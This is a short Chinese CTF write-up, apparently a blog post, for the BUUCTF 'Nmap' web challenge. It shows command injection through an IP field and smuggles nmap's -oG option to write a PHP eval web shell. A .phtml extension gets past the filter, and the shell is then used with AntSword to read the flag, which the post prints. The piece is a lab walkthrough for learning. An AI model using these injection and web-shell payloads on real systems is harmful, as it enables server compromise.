BUUCTF——Nmap

BUUCTF------Nmap

进入靶场

类似于一个nmap的网站

尝试一下功能

没什么用

看看数据包 既然跟IP相关

伪造一个XXF看看

拼接了一下没什么用 果然没这么简单

尝试一下命令注入

构造payload 127.0.0.1 | ls

应该有过滤 加了个\

直接构造个php木马上传试试

复制代码
127.0.0.1 | ' <?php @eval($_POST["cmd"]);?> -oG shell.php '

应该被过滤了

也没有什么提示 盲猜是后缀名 mini绕过试试

双写、php3都试过了 最后phtml成功了

复制代码
127.0.0.1 | ' <?= @eval($_POST["cmd"]);?> -oG shell.phtml '

拼接访问一下成功上传

用蚁剑连接看看

成功连接

接下来就慢慢找flag

在根目录下找到flag

复制代码
flag{aade295d-204f-476f-91ee-299a5fa993a2}

下播!!!!!

相关推荐
Suckerbin13 分钟前
digitalworld.local: TORMENT
笔记·安全·web安全·网络安全
普通网友36 分钟前
前端安全攻防:XSS, CSRF 等防范与检测
前端·安全·xss
绝世剑仙纪宁1 小时前
TCP 三次握手、四次挥手
网络·网络协议·tcp/ip
索迪迈科技1 小时前
HTTP中Payload的含义解析
网络·网络协议·http
时空潮汐2 小时前
我用神卓 NAT 公网 IP 盒子搭建《我的世界》联机的经历
网络·网络协议·tcp/ip
liulilittle2 小时前
HTTP/3.0:网络通信的技术革新与性能飞跃
网络·网络协议·http·https·quic·流媒体·通信
CYRUS_STUDIO2 小时前
如何防止 so 文件被轻松逆向?精准控制符号导出 + JNI 动态注册
android·c++·安全
CYRUS_STUDIO2 小时前
C&C++ 代码安全再升级:用 OLLVM 给 so 加上字符串加密保护
c++·安全·llvm
岑梓铭2 小时前
计算机网络第四章(4)——网络层《ARP协议》
网络·笔记·tcp/ip·计算机网络·考研·408
lingggggaaaa2 小时前
小迪安全v2023学习笔记(八十讲)—— 中间件安全&WPS分析&Weblogic&Jenkins&Jetty&CVE
笔记·学习·安全·web安全·网络安全·中间件·wps